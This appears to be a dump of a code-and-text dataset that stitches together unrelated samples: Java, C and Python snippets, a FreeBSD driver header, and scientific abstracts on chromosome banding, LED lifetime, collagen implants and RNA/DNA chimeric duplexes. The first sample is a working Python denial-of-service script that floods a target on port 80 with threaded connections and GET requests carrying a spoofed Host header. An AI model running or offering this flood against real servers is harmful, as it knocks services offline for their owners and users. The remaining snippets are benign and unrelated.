content
stringlengths
10
4.9M
import threading import socket import time target= "target ip" port=80 fake_ip="172.16.31.10" def dos(): while True: stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM) stream.connect((target,port)) stream.sendto((f"GET /{target} HTTP/1.1\r\n").encode("ascii"),(target,port)) stream.sendto((f"Host: {fake_ip}\r\n\r\n").encode('ascii'),(target,port)) stream.close() for i in range(500): thread=threading.Thread(target=dos) time.sleep(4) thread.start()
/** * Helps with Setting a list. Tries to deal with nulls and throws a * more helpful exception than the otherwise thrown * {@link IndexOutOfBoundsException}. * * @author rob * */ public class ListSetterHelper<E> { private final List<E> elements; public ListSetterHelper() { this(new LinkedList<>()); } public ListSetterHelper(List<E> list) { this.elements = list; } public void set(int index, E element) { if (index < elements.size()) { if (element == null) { elements.remove(index); } else { elements.set(index, element); } } else if (index == elements.size()) { elements.add(element); } else { throw new IllegalArgumentException("Index " + index + " would leave gaps which isn't allowed."); } } public List<E> getList() { return this.elements; } }
Reverse banding on chromosomes produced by a guanosine-cytosine specific DNA binding antibiotic: olivomycin. Characteristic reverse fluorescent banding patterns (R bands) on human, bovine, and mouse metaphase chromosomes are produced by treating chromosome preparations directly with olivomycin. With the DNA in solution, the repeating polymer poly - poly - poly (where A is adenine and T is thymine). Calf thymus DNA, with an intermediate G-C content of about 40 percent, showed a smaller fluorescence enhancement in the presence of olivomycin as was observed for the synthetic polynucleotide poly - poly . The closely related antibiotic chromomycin A3 showed the same results as were obtained with olivomycin either in the solution interaction with specific DNA's or with the netaphase chromosome preparations. The production of R bands by these G-C-specific DNA binding antibiotics lends credence to the suggestion that the arrangement of the nucleotide sequences along the chromosome is a primary determinant for the appearance of fluorescent bands.
Effect of injection-molding-induced residual stress on microchannel deformation irregularity during thermal bonding Micro injection molding offers a promising approach to rapidly produce thermoplastic microfluidic substrates in large volumes. Many research works have been focused on the replication fidelity of microstructures by injection molding. However, there has not been any investigation on the effect of molded-in residual stress on microchannel deformation during the subsequent thermal bonding process. These effects could be important, because the residual stress developed due to anisotropic polymer flow orientation and inhomogeneous cooling may lead to abnormal microchannel distortion. In the direct thermal bonding process, asymmetric cross-sectional distortion was observed in well-formed microchannels aligned perpendicular to the polymer melt injection direction. This asymmetric distortion is attributed to the residual stress introduced into the substrates during molding, particularly in the surface region where microchannels are molded. Design of experiment on injection molding was carried out to reduce the residual stress in order to achieve the lowest microchannel deformation irregularity, which is a new term defined in this study. The direct thermal bonding was utilized as a feasible non-destructive indirectly quantitative method to evaluate the effect of residual stress around microchannel regarding deformation irregularity. The dominant molding parameters with positive effects were found to be melt temperature, mold temperature as well as cooling time after packing. The presence of the residual stress was also demonstrated through photoelastic stress analysis in terms of phase retardation. With improved molding condition, the absolute retardation difference around microchannels aligned parallel and perpendicular to the molding direction could be tuned to the same level, which indicates that the molded-in residual stresses have been moderated.
/** * Ticks the flux handler * Should be called every tick */ @Override public void tick(){ World world = owner.getLevel(); if(world.isClientSide()){ if(rendered.length != 0 && world.getGameTime() % FluxUtil.FLUX_TIME == 0 && CRConfig.fluxSounds.get()){ CRSounds.playSoundClientLocal(world, owner.getBlockPos(), CRSounds.FLUX_TRANSFER, SoundCategory.BLOCKS, 0.4F, 1F); } return; } long worldTime = world.getGameTime(); if(worldTime != lastTick){ lastTick = worldTime; if(lastTick % FluxUtil.FLUX_TIME == 0){ int toTransfer = flux; readingFlux = flux; flux = queuedFlux; queuedFlux = 0; if(fluxTransferHandler == null){ Pair<Integer, int[]> transferResult = FluxUtil.performTransfer(this, linkHelper.getLinksRelative(), toTransfer); flux += transferResult.getLeft(); if(!Arrays.equals(transferResult.getRight(), rendered)){ rendered = transferResult.getRight(); CRPackets.sendPacketAround(world, owner.getBlockPos(), new SendIntArrayToClient(RENDER_ID, rendered, owner.getBlockPos())); } }else{ fluxTransferHandler.accept(toTransfer); } owner.setChanged(); shutDown = FluxUtil.checkFluxOverload(this); } } }
A Lifetime Performance Analysis of LED Luminaires Under Real-Operation Profiles Light-emitting diode (LED)-based lighting is the most dominant lighting solution in the current era since it is energy-efficient and long-lasting. Hence, performance analysis of the LEDs throughout its lifetime is of prime importance. The work presented in this article provides insight on degradation analysis of the LED luminaire inclusive of the LED driver in real operating ambient conditions and investigates the performance of both LED light engine and LED driver throughout the period of its lifetime. To represent the practical scenario of LED lighting system usage in commercial applications, analysis of switching cycles on the performance of LED luminaires is also studied. The outcome of this article suggests that LED luminaire under study tends to fail due to lumen degradation, followed by color shift represented by Duv and then lastly by driver failure. Scanning electron microscope and energy-dispersive spectroscopy (SEM-EDS) analysis suggests the corrosion of Ag mirror resulting in lumen output reduction and, thus, is the main reason for the failure of LED luminaire. This provides an insight into the LED manufacturing companies to have better estimate on lifetime of LED luminaires and also the necessity to improve the LEDs’ performance such that luminaires will have longer lifetime as claimed.
Characterization and biocompatibility of epoxy-crosslinked dermal sheep collagens. Dermal sheep collagen (DSC), which was crosslinked with 1, 4-butanediol diglycidyl ether (BD) by using four different conditions, was characterized and its biocompatibility was evaluated after subcutaneous implantation in rats. Crosslinking at pH 9.0 (BD90) or with successive epoxy and carbodiimide steps (BD45EN) resulted in a large increase in the shrinkage temperature (T(s)) in combination with a clear reduction in amines. Crosslinking at pH 4.5 (BD45) increased the T(s) of the material but hardly reduced the number of amines. Acylation (BD45HAc) showed the largest reduction in amines in combination with the lowest T(s). An evaluation of the implants showed that BD45, BD90, and BD45EN were biocompatible. A high influx of polymorphonuclear cells and macrophages was observed for BD45HAc, but this subsided at day 5. At week 6 the BD45 had completely degraded and BD45HAc was remarkably reduced in size, while BD45EN showed a clear size reduction of the outer DSC bundles; BD90 showed none of these features. This agreed with the observed degree of macrophage accumulation and giant cell formation. None of the materials calcified. For the purpose of soft tissue replacement, BD90 was defined as the material of choice because it combined biocompatibility, low cellular ingrowth, low biodegradation, and the absence of calcification with fibroblast ingrowth and new collagen formation.
/* Writes to the log and updates the cursor and committed index. Abstracts away ledgers and handles - is at the log abstraction level. A single log writer instance only ever writes to a single ledger. When an event occurs such as the ledger having been closed, fenced or there not being enough bookies to write, then the writer aborts. */ public class LogWriter extends LogClient { private Logger logger = LogManager.getLogger(this.getClass().getSimpleName()); private LedgerWriteHandle writeHandle; private Versioned<List<Long>> cachedLedgerList; public LogWriter(ManagerBuilder managerBuilder, MessageSender messageSender, BiConsumer<Position, Op> cursorUpdater) { super(managerBuilder, messageSender, cursorUpdater); this.cachedLedgerList = new Versioned<>(new ArrayList<>(), -1); } public CompletableFuture<Void> start(Versioned<List<Long>> cachedLedgerList) { this.cachedLedgerList = cachedLedgerList; return createWritableLedgerHandle() .thenApply(this::checkForCancellation) .thenAccept((Void v) -> { Position p = new Position(writeHandle.getLedgerId(), -1L); cursorUpdater.accept(p, null); }); } @Override public void cancel() { isCancelled.set(true); if (writeHandle != null) { writeHandle.cancel(); } } public boolean isHealthy() { return writeHandle.getCachedLedgerMetadata().getValue().getStatus().equals(LedgerStatus.OPEN); } public Versioned<List<Long>> getCachedLedgerList() { return cachedLedgerList; } public void printState() { logger.logInfo("-------------- Log Writer state -------------"); if (writeHandle == null) { logger.logInfo("No ledger handle"); } else { writeHandle.printState(); } logger.logInfo("---------------------------------------------"); } public CompletableFuture<Void> close() { CompletableFuture<Void> future = new CompletableFuture<>(); writeHandle.close() .whenComplete((Versioned<LedgerMetadata> vlm, Throwable t) -> { if (isError(t)) { future.completeExceptionally(t); } else { future.complete(null); } }); return future; } public CompletableFuture<Void> write(String value) { return writeHandle.addEntry(value) .thenApply(this::checkForCancellation) .thenAccept((Entry entry) -> { Op op = Op.stringToOp(entry.getValue()); Position pos = new Position(entry.getLedgerId(), entry.getEntryId()); cursorUpdater.accept(pos, op); }); } private CompletableFuture<Void> createWritableLedgerHandle() { CompletableFuture<Void> future = new CompletableFuture<>(); ledgerManager.getAvailableBookies() .thenApply(this::checkForCancellation) .thenCompose((List<String> availableBookies) -> createLedgerMetadata(availableBookies)) .thenApply(this::checkForCancellation) .thenCompose((Versioned<LedgerMetadata> vlm) -> appendToLedgerList(vlm)) .thenApply(this::checkForCancellation) .whenComplete((Versioned<LedgerMetadata> vlm, Throwable t) -> { if (t == null) { writeHandle = new LedgerWriteHandle(ledgerManager, messageSender, vlm); logger.logDebug("Created new ledger handle for writer"); writeHandle.printState(); future.complete(null); } else if (isError(t)) { future.completeExceptionally(t); } else { future.complete(null); } }); return future; } private CompletableFuture<Versioned<LedgerMetadata>> createLedgerMetadata(List<String> availableBookies) { if (availableBookies.size() < Constants.Bookie.WriteQuorum) { return Futures.failedFuture( new BkException("Not enough non-faulty bookies", ReturnCodes.Bookie.NOT_ENOUGH_BOOKIES)); } else { return ledgerManager.getLedgerId() .thenApply(this::checkForCancellation) .thenCompose((Long ledgerId) -> { List<String> ensemble = randomSubset(availableBookies, Constants.Bookie.WriteQuorum); LedgerMetadata lmd = new LedgerMetadata(ledgerId, Constants.Bookie.WriteQuorum, Constants.Bookie.AckQuorum, ensemble); logger.logDebug("Sending create ledger metadata request: " + lmd); return ledgerManager.createLedgerMetadata(lmd); }); } } private CompletableFuture<Versioned<LedgerMetadata>> appendToLedgerList(Versioned<LedgerMetadata> ledgerMetadata) { CompletableFuture<Versioned<LedgerMetadata>> future = new CompletableFuture<>(); cachedLedgerList.getValue().add(ledgerMetadata.getValue().getLedgerId()); metadataManager.updateLedgerList(cachedLedgerList) .thenAccept((Versioned<List<Long>> vll) -> { logger.logDebug("Appended ledger to list: " + vll.getValue()); cachedLedgerList = vll; future.complete(ledgerMetadata); }) .whenComplete((Void v, Throwable t) -> { if (t != null) { future.completeExceptionally(t); } }); return future; } private List<String> randomSubset(List<String> bookies, int subsetSize) { List<String> copy = new ArrayList<>(bookies); Collections.shuffle(copy); return copy.stream().limit(subsetSize) .sorted() .collect(Collectors.toList()); } }
/** * Draw game over screen * * @param graphic The instance of Graphics class */ private void drawGameOver(Graphics graphic) { LOGGER.finer("Drawing game over"); String gameOverMsg = "Game over!"; String playAgainMsg = "Click and hold anywhere to play again"; String scoreMsg = lastScore.toString(); graphic.setColor(Color.WHITE); graphic.setFont(fontManager.getBigFont()); graphic.drawString(scoreMsg, (windowWidth - fontManager.getBigMetrics().stringWidth(scoreMsg)) / 2, windowHeight / 2 - 50); graphic.setColor(Color.WHITE); graphic.setFont(fontManager.getMediumFont()); graphic.drawString(gameOverMsg, (windowWidth - fontManager.getMediumMetrics().stringWidth(gameOverMsg)) / 2, windowHeight / 2 ); graphic.setColor(new Color(201, 16, 52)); graphic.setFont(fontManager.getSmallFont()); graphic.drawString(playAgainMsg, (windowWidth - fontManager.getSmallMetrics().stringWidth(playAgainMsg)) / 2, (windowHeight / 2) + 50); }
def _get_object(name: str) -> Optional[base.Trackable]: module = TFGraphContext.get_module_to_export() if module is None: raise RuntimeError( f'No module found to track {name} with. Check that the `preprocessing_fn` is' ' invoked within a `TFGraphContext` with a valid ' '`TFGraphContext.module_to_export`.') return getattr(module, name, None)
<reponame>LuisAlvarez98/VirtualMemorySimulator #ifndef Files_h #define Files_h #include <string.h> #include <fstream> using namespace std; class Files { public: Files() {} // Intenta abrir un archivo bool tryOpen(string filename, ifstream &file) { file.open(filename); if (file.is_open()) { return true; } if (file.peek() == ifstream::traits_type::eof()) { //el archivo esta vacio return false; } return false; } //Lee los datos del archivo y los va guardando }; #endif
#include "TextBox.h" #include "InputComponent.h" #include "Engine.h" #include "SpriteComponent.h" TextBox::TextBox(float x, float y, const char* name, const char* path) : Actor(x, y, name) { m_spriteComponent = dynamic_cast<SpriteComponent*>(addComponent(new SpriteComponent(path))); } void TextBox::start() { m_inputComponent = dynamic_cast<InputComponent*>(addComponent(new InputComponent())); } void TextBox::update(float deltaTime) { // Use the inputs to allow the player to start the game or quit the game. if (m_inputComponent->get1KeyPressed()) Engine::setCurrentScene(1); if (m_inputComponent->get2KeyPressed()) Engine::CloseApplication(); }
/* Convert the start_indices/end_indices into a string slice */ void nccf_make_slice( int ndims, int bind[], int eind[], char *slice ){ char *iBegStr, *iEndStr; char range[STRING_SIZE]; int i; strcpy( slice, "\0" ); iBegStr = (char*)calloc( STRING_SIZE, sizeof(char) ); iEndStr = (char*)calloc( STRING_SIZE, sizeof(char) ); for (i = 0; i < ndims; ++i) { sprintf(iBegStr, "%d", bind[i]); sprintf(iEndStr, "%d", eind[i]); strcpy(range, iBegStr); strcat(range, CF_RANGE_SEPARATOR); strcat(range, iEndStr); if (i < ndims - 1) { strcat(range, CF_INDEX_SEPARATOR); } strcat(slice, range); } free( iBegStr ); free( iEndStr ); }
/** * Test the text of the response message */ @Test public void testMessage() { ResponseMessage message = new ResponseMessage(); message.setText("TEXT"); assertEquals(message.getText(), "TEXT"); }
def testResults(self): self.ips_obj = iperf.IperfSet(self.fake_host_src, self.fake_host_dst, IperfSetTest.dst) self.ips_obj.Start(length=10) self.ips_obj.Stop() results = self.ips_obj.Results() self.assertEqual(len(results), 2) self.assertEqual(len(results[0]), len(self.fake_host_dst)) self.assertEqual(len(results[1]), len(self.fake_host_src)) for i in range(0, len(self.fake_host_dst)): self.assertIn('Server listening', results[0][i]) for i in range(0, len(self.fake_host_src)): self.assertIn('Client connecting', results[1][i])
package spring.project.common.model; public enum PlayerState { DEFINING, BEGINNING,PLAYING,ENDING; }
/* * Write a code to the output stream. */ inline void G3Encoder::putcode(const tableentry& te) { putBits(te.code, te.length); }
The RNA world hypothesis1-3 postulates that RNA played the role of DNA (genotype) and proteins (phenotype) and gave rise later to an RNA/DNA/Protein world, implying that proteins and DNA were the inventions of an RNA world (Scheme 1 a).4-7 This hypothesis is largely based on the analysis of extant biochemical machinery and that deoxyribonucleotides are formed by the enzyme‐catalyzed reduction of ribonucleotides.8-10 However, this is countered by the arguments that DNA was earlier, or arose concurrent with RNA, supported by plausible prebiotic routes to deoxyribonucleosides or its precursors.11-17 That RNA led to DNA, or vice versa, or could have coexisted before the sophisticated biochemical machinery came into existence, raises the question of how one homogeneous backbone system (RNA) gave rise to another homogeneous backbone (DNA) in a protobiological (and/or prebiological) world17-19 without encountering heterogeneous backbones (Scheme 1 b). In extant biology, there are instances of RNA–DNA heterogeneity in nuclear DNA due to the misincorporation of rNMP by DNA polymerase.20-22 Moreover, some RNA polymerases and their mutants are shown to accept dNMPs and tolerate sugar heterogeneity sites in a DNA‐ or RNA‐ or hybrid template‐mediated replication.23-26 It has been suggested these observations imply that backbone heterogeneity was part of the evolutionary process, still manifested in extant biology.23 In current biology, misincorporation of rNMP in DNA and dNMP in RNA are carefully guarded against by utilizing evolved repair, editing and proof‐reading enzymes.27, 28 Absent alternative mechanisms (primitive catalysts or compartments) that were able to distinguish between the nucleotides of DNA and RNA and/or keep them spatially separated, oligomeric sequences containing random mixtures of RNA and DNA residues would have been inevitable.14-19 Scheme 1 Open in figure viewerPowerPoint The RNA world concept. a) Transition from a homogeneous RNA backbone to a homogeneous DNA backbone is assumed during the invention of DNA by RNA, b) without consideration of the role of heterogeneous backbone chimeric sequences that would be formed. From previous studies of homogeneous backbone sequences, the thermal stability of hybrid duplexes follows the general trend RNA–RNA >RNA–DNA >DNA–DNA (or DNA–DNA >DNA–RNA) depending on the sequence context.29-33 Based on such studies and others involving homogeneous backbones of XNAs, there is an implicit assumption in the RNA world approach that mixed RNA–DNA polymers containing monomers of each type could still engage in base‐pair mediated replication and tolerate chemical heterogeneity.18 Whether this enables a smooth transfer of information going from a homogeneous RNA backbone to homogenous DNA backbone, via “heterogeneous backbone” systems, was the motivation for this study (Scheme 2 b). Since Watson–Crick base‐pair mediated interactions are at the heart of RNA‐to‐DNA information transfer and fidelity (via template‐mediated replication), the base‐pairing behavior of heterogeneous backbone chimeric sequences of RNA and DNA was investigated and compared to parent RNA and DNA sequences. Four sets of sequences, self‐complementary and non‐self‐complementary A–T/u 16‐mer, non‐self‐complementary A–T/u–G–C 10‐mer, and self‐complementary C–G 6‐mer were chosen as representative systems (lower case indicates ribonucleotide) (Figure 1). In order to constrain the space of possible combinations, a set of heterogeneous backbone chimeric sequences representative of transitioning from RNA to DNA was generated by systematically changing a) RNA‐pyrimidine(r‐Py) to DNA‐pyrimidine(d‐Py) and b) RNA‐purine(r‐Pu) to DNA‐purine(d‐Pu). This led to 8, 32 and 16 (r/d)Pu–(r/d)Py duplex combinations for the first 3 sets of sequences. The smaller number of nucleotides in the C–G 6‐mer sequences allowed investigation of more diverse backbone patterns. We measured the base‐pairing propensity of all sequences via UV‐T m thermal melts and, for selected sequences, the temperature‐dependent CD spectra to gain insight into how some of these chimeric duplexes compare with their unmodified parent duplexes in overall helical structure. Figure 1 Open in figure viewerPowerPoint Charts displaying base‐pairing stability relative to RNA (ΔT m (°C)) for each duplex (blue bars) and for the average of a given RNA:DNA ratio (orange line and dots). a) self‐complementary A–T/u, b) non‐self‐complementary A–T/u, c) non‐self‐complementary A–T/u–G–C and d) self‐complementary C–G sequences. a, u, c, g represent RNA and A, T, C, G represent DNA. For conditions of measurements and T m values see the Supporting Information (Tables S1–S5). The thermal melt studies of the self‐complementary A–T/u system, 5′‐(au) 8 ‐3′ to 5′‐(AT) 8 ‐3′ indicated that the homogeneous backbone combinations were the most stable duplexes (Figure 2 a). The heterogeneous backbone chimeric duplexes had significantly reduced thermal stabilities compared to the homogeneous parent DNA or RNA duplexes (Figure S1 and Table S1 in the Supporting Information). There was little variance due to the directionality of either nucleobase or backbone sequences (e.g. 5′‐(Pu‐Py) n ‐3′ vs. 5′‐(Py‐Pu) n ‐3′ and 5′‐(ribose‐deoxyribose) n ‐3′ vs. 5′‐(deoxyribose‐ribose) n ‐3′) in these destabilized duplexes (Figure 2 a). The detrimental impact of backbone heterogeneity on base‐pairing stability in this simple duplex system was significant, much more than what was expected from previous studies.29-31 The non‐self‐complementary system 5′‐a 4 u 3 auau 2 au 2 a‐3′+3′‐u 4 a 3 uaua 2 ua 2 u‐5′ provided the possibility for varying the ratios of RNA:DNA nucleotides within a duplex and the opportunity to study non‐symmetric chimeric backbone sequences (Figure 2 b and Figures S2, S3). Similar to the self‐complementary system, duplexes with homogeneous ribose and deoxyribose backbones had the highest thermal stabilities (Figure 2 b, Table S2). The heterogeneous backbone chimeric systems formed a pool of relatively destabilized duplexes. Simulating the transition from the full RNA duplex to the fully mixed duplexes via “modification” of ribose‐to‐deoxyribose consistently led to decreases in duplex stability. The first round of modification, to either of the two strands leading to the 75 %/25 % RNA/DNA duplexes, were generally all disruptive giving T m values 3–14 °C lower than the 100 % RNA duplex. Further modification to duplexes where both strands were heterogeneous caused further reduction in duplex thermal stability (Figures S2, S3, Table S2). Similarly, continued infiltration of rNMP into DNA to form the 25 %/75 % RNA/DNA duplexes, irrespective of whether it is pyrimidine or purine residues decreased duplex stability. Further incorporation of rNMP into DNA led to varying decreases in duplex stability depending on whether it was a purine or a pyrimidine residue. In general terms, the thermal stability lost from the transition from RNA (or DNA) to the 50 %/50 % RNA/DNA chimeras is about −1 °C per modification. The same was true for the reverse combination 5′‐u 4 a 3 uaua 2 ua 2 u‐3′+3′‐a 4 u 3 auau 2 au 2 a‐5′ (Figures S4, S5, Table S3). There did not appear to be any discernable thermal stability trend due to inter‐strand nucleotide backbone pairing patterns (e.g. d‐ with d‐ and r‐ with r‐ vs. d‐ with r‐ and r‐ with d‐) nor for regular vs. irregular insertions within the chimeric duplexes (Tables S2, S3). In nearly all cases, the modification of ribopurines to deoxyribopurines was more disruptive to duplex thermal stability than similar modification of the pyrimidines. The weakest base‐pairing for the fully chimeric duplex was when all of the ribopurines were modified to deoxyribopurines, while the strongest base‐pairing for the chimeric duplex was when all of the ribopurines were retained (Figures S7, S8), consistent with previous observations for the homogeneous backbone chimeric duplexes.32, 33 With the expectation that a stronger C–G base‐pair might mitigate the drastic weakening in thermal stability due to RNA–DNA backbone heterogeneity, we studied a 10‐mer duplex 5′‐cgau 3 agcg‐3′+3′‐gcua 3 ucgc‐5′ containing all four canonical nucleobases (Figure 2 c, Figures S9, S10). The duplexes were designed to have an equal number of C–G and A–T/u base pairs, and an equal number of pyrimidines and purines on each strand. This provided a series of intermediate chimeric duplexes with varying percentages of ribose or deoxyribose to span the landscape between the extremes of homogeneous RNA and DNA. In spite of the expanded nucleobase heterogeneity (A, T/u, G, C), the trends in thermal instability of chimeric duplexes paralleled the observations for the two‐base A–T/u chimeric sequences. Doping dNMP (or rNMP) into one strand reduced the duplex thermal stability (4–12 °C lower) relative to the homogeneous RNA (or DNA) duplex, with the magnitude depending on whether modifications occurred at the pyrimidine or purine sites (Table S4, Figure S11). Introducing C–G pairs into the chimeric duplexes appears to enhance the destabilizing effects of backbone heterogeneity on base‐pairing. The ΔT m /modification for RNA and DNA going to 50 %/50 % chimera were, on average −1.6 °C and −1.2 °C, respectively, indicating that modification of RNA causes more significant destabilization than what is gained back in duplex stabilization in modification from chimera to DNA in the A–T/u–G–C pairing system. For the CG‐only containing self‐complementary sequences 5′‐(cg) 3 ‐3′, the same trends were observed (Figure 2 d, Figure S12); the homogeneous backbone RNA and DNA sequences had the highest stabilities while the mixed backbone sequences experienced a deep drop (ca. −20 °C, Table S5). The CD spectra for all heterogeneous backbone A–T/u–G–C chimeric duplexes display features that fall in between those for the parent RNA and DNA spectra (Figure S13). The general line shapes and peak shifts of the theoretical and experimental spectra correlate well, further supporting the intermediate helical nature of the chimeras similar to previous RNA–DNA chimeric systems.34, 35 A van't Hoff analysis was undertaken to assess the influence of backbone heterogeneity on the A–T/u–G–C base‐pairing system in terms of thermodynamic stability.36 The thermodynamic contributions of each duplex as well as the change in free energy (ΔΔG 298 ) relative to homogeneous RNA were determined (Table S4, Figures S14–S16). These values have similar trends as those observed for the T m values: as the backbones tend towards heterogeneity (50 % RNA/50 % DNA) there is a steady increase in the thermodynamic instability, pointing to the existence of a free‐energy barrier in the energy landscape of RNA‐to‐DNA transition (Figure 2). Within each duplex class (differing ratios of ribose to deoxyribose) the most favorable free energies (lowest ΔG 298 ) correspond to the duplexes with greatest proportion of ribopurines. Additionally, the duplexes with the most favorable enthalpic component have higher amounts of ribopurine, whereas the most entropically favored duplexes tend to be richer in deoxyribopurines. Figure 2 Open in figure viewerPowerPoint Bar graph of relative free energies (ΔΔG) of chimeric A–T/u–G–C duplexes. The transition of RNA to DNA encounters thermodynamically unstable intermediate heterogeneous chimeric duplexes which vary in their relative stability depending on the number of chimeric junctions and content of purine‐RNA (r‐Pu). For conditions of measurements see the Supporting Information. The thermal stability decreases consistently with accruing numbers of chimeric RNA–DNA junctions; however, for the same number of chimeric junctions, it also depends very much on which backbone unit carries the pyrimidine or purine nucleobase (Figures S7, S8 and S11). As the systems tend towards homogeneity in the backbone, both of these effects vanish and the thermal stabilities of the duplexes increase.29 The significant and surprising destabilization of the highly heterogeneous chimeric duplexes, while requiring an in‐depth structural analysis,37 seems to stem from the conflicting conformational tendencies of ribose (“structural conservatism of RNA” favoring the A‐form, restricted to a 3′‐endo sugar pucker) versus deoxyribose (“polymorphism of DNA” favoring the B‐form, preferring a 2′‐endo sugar pucker).38 This conflicting sugar heterogeneity within the same backbone sequence gives rise to divergent inter‐phosphate distances (5.9 Å in A‐type versus 7 Å in B‐type duplex), differing dislocation of helix axis (4.4 to 4.9 Å versus −0.2 to −1.8 Å), opposing base‐pair tilt (+10° to +20.2° versus −5.9° to −16.4°) and inconsistent rotation per residue (30° to 32.7° versus 36° to 45°).38 Such local effects when coupled with nucleobase heterogeneity alter the overall curvature of the duplex, making it difficult to adopt either of the favored forms, detrimentally impacting the base‐pairing symmetry of inter‐ and intra‐strand base‐stacking overlaps.33, 38, 39 The current study raises questions regarding the feasibility of a linear transition from a homogeneous RNA world to a RNA/DNA world (“genetic takeover”), given the potential for heterogeneous backbone sequences to be a part of this transition. Some of the heterogeneous sequences themselves could have played a constructive role; it has been proposed that weak base‐pairing of polymer strands may have facilitated the strand separation necessary for replication.18 Depending on the percent incorporation of DNA there could still be an A‐form of the heterogeneous sequence that could be conducive to template mediated oligomerization.40, 41 However, the increased destabilization of duplexes above a certain threshold backbone heterogeneity may impede base‐pair mediated higher order structure and function leading to “non‐inheritable backbones”.18 Chimeric RNA–DNA sequences have been shown to reduce aptamer activity 1000‐fold when compared to the parent homogeneous RNA and DNA systems.18 Similar incorporation of 2′–5′ linkages in RNA has been shown to reduce or even abolish base‐pairing42 and also reduce aptamer activity43 when compared to homogeneous parent systems. Such heterogeneous backbone induced instability is also true for other systems such as backbones with mixed chirality.44 All of these results, indicate that a) homogeneous backbones form duplexes that are stable and form catalysts that are functionally superior when compared to the heterogeneous backbone systems, and b) a limited amount of heterogeneous backbones could have played a role in the emergence of homogeneous systems19, 43 by selective pressures that would have been present to move the system from an initially heterogeneous backbone to a homogeneous one. Apart from base‐pairing properties, resistance to hydrolytic degradation is another consideration for oligonucleotides.45 Base‐paired duplexes and tertiary structures are known to be more stable to hydrolytic degradation when compared to the corresponding single‐strand oligonucleotides.46-48 The thermally stable duplexes (composed of homogeneous and limited chimeric sequences) would persist, while the heterogeneous single strands hydrolyze back to their monomeric constituents to be recycled by the non‐enzymatic oligomerization process to form oligomers of various compositions. This repetitive process could lead to a gradual stockpiling of the more stable homogeneous backbone (RNA and DNA) duplex systems due to this preferential hydrolysis of the (heterogeneous) single strands. While the rate of deoxyribonucleotide incorporations could be low (lesser nucleophilicity of the 3′‐OH) compared to ribonucleotides (higher nucleophilicity of 2′,3′‐OH) thus limiting heterogeneity of DNA in RNA, this is countered by the expected accumulation of DNA in a sequence from the higher rates of hydrolysis of RNA over DNA.11 The consistent trends observed in the four sets of RNA/DNA duplex systems opens up the possibility that homogeneous backbone systems (RNA and DNA) may have been a natural outcome starting from a heterogeneous prebiotic scenario,14-16 a scenario that can be extended to the emergence of homochiral backbones as well.44, 49 Instead of starting from a homogeneous/chiral RNA world, there could have been a heterogeneous/chiral mixture of RNA and DNA that could have led to the accumulation of the thermally and thermodynamically more stable homochiral homogeneous RNA and DNA sequences/duplexes/structures capable of fulfilling the informational and catalytic roles50 necessary for Darwinian co‐evolution (Scheme 2), avoiding the “prebiological necessity” for RNA to invent catalysts to give rise to DNA and the subsequent genetic takeover.14 Such a heterogeneous‐to‐homogeneous scenario19, 45, 51 would imply a co‐formation, co‐existence and co‐evolution of RNA and DNA, likely to be aided by the presence of other classes of molecules such as proto‐peptides and proto‐lipids.52-54 Scheme 2 Open in figure viewerPowerPoint Heterogeneity‐to‐homogeneity model: homogeneous backbone RNA and DNA systems could accumulate and emerge from a heterogeneous pool of compounds and intermediates based on increasing thermal and thermodynamic duplex stability. The model can be extended to include other heterogeneity such as configuration (α, β), chirality (d, l) and other sugars (e.g. pentoses). In memory of James P. Ferris
// Function to replace every element with the // least greater element on its right void replace(int arr[], int n) { Node *root = NULL; for (int i = n - 1; i >= 0; i--) { Node *succ = NULL; root = insert(root, arr[i], succ); if (succ) arr[i] = succ->data; else arr[i] = -1; } }
<reponame>sunchaser-lilu/sunchaser-hikari package com.sunchaser.sparrow.javaee.graphql.domain.bank.input; import lombok.Data; import javax.validation.constraints.NotBlank; /** * @author sunchaser <EMAIL> * @since JDK8 2022/5/6 */ @Data public class CreateBankAccountInput { @NotBlank private String firstName; private Integer age; }
/*- * Copyright (c) 2010-2011 Solarflare Communications, Inc. * All rights reserved. * * This software was developed in part by <NAME> under contract for * Solarflare Communications, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include <sys/cdefs.h> __FBSDID("$FreeBSD: releng/9.3/sys/dev/sfxge/sfxge_mcdi.c 227569 2011-11-16 17:11:13Z philip $"); #include <sys/param.h> #include <sys/condvar.h> #include <sys/lock.h> #include <sys/mutex.h> #include <sys/proc.h> #include <sys/syslog.h> #include <sys/taskqueue.h> #include "common/efx.h" #include "common/efx_mcdi.h" #include "common/efx_regs_mcdi.h" #include "sfxge.h" #define SFXGE_MCDI_POLL_INTERVAL_MIN 10 /* 10us in 1us units */ #define SFXGE_MCDI_POLL_INTERVAL_MAX 100000 /* 100ms in 1us units */ #define SFXGE_MCDI_WATCHDOG_INTERVAL 10000000 /* 10s in 1us units */ /* Acquire exclusive access to MCDI for the duration of a request. */ static void sfxge_mcdi_acquire(struct sfxge_mcdi *mcdi) { mtx_lock(&mcdi->lock); KASSERT(mcdi->state != SFXGE_MCDI_UNINITIALIZED, ("MCDI not initialized")); while (mcdi->state != SFXGE_MCDI_INITIALIZED) (void)cv_wait_sig(&mcdi->cv, &mcdi->lock); mcdi->state = SFXGE_MCDI_BUSY; mtx_unlock(&mcdi->lock); } /* Release ownership of MCDI on request completion. */ static void 